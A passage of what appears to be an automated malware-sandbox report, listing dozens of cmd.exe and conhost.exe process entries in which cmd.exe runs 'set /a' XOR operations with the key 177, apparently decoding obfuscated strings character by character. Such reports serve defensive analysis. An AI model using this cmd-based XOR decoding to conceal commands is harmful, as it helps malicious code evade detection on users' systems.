Commandline: cmd.exe /c set /a "195^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 51
Start time: 08:44:42
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 52
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "133^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 53
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 54
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "145^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 55
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 56
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "157^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 57
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 58
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "145^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 59
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 60
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "216^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 61
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 62
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "145^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 63
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 64
Start time: 08:44:43
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "129^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:65
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:66
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "201^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:67
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:68
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "137^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:69
                                                                              Start time:08:44:43
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:70
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:71
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:72
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:73
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:74
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:75
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:76
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:77
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:78
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:79
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:80
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:81
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:82
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "129^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:83
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:84
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "157^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:85
                                                                              Start time:08:44:44
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 86
Start time: 08:44:44
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "145^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 87
Start time: 08:44:44
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 88
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "216^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 89
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 90
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "145^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 91
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 92
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "129^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 93
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 94
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "157^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 95
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 96
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "145^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 97
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 98
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "193^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 99
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 100
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "145^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 101
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 102
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "129^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 103
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 104
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "157^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 105
Start time: 08:44:45
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 106
Start time: 08:44:46
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "145^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 107
Start time: 08:44:46
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 108
Start time: 08:44:46
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "216^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 109
Start time: 08:44:46
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 110
Start time: 08:44:46
Start date: 24/07/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):
Commandline: cmd.exe /c set /a "145^177"
Imagebase:
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:
Has administrator privileges:
Programmed in: C, C++ or other language
Has exited: false

Target ID: 111
Start time: 08:44:46
Start date: 24/07/2024
Path: C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size: 875'008 bytes
MD5 hash: 81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:112
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "133^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:113
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:114
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "157^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:115
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:116
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:117
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:118
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "216^177"
                                                                              Imagebase:
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:119
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:
                                                                              File size:875'008 bytes
                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Has exited:false

                                                                              Target ID:120
                                                                              Start time:08:44:46
                                                                              Start date:24/07/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):
                                                                              Commandline:cmd.exe /c set /a "145^177"
                                                                              Imagebase:
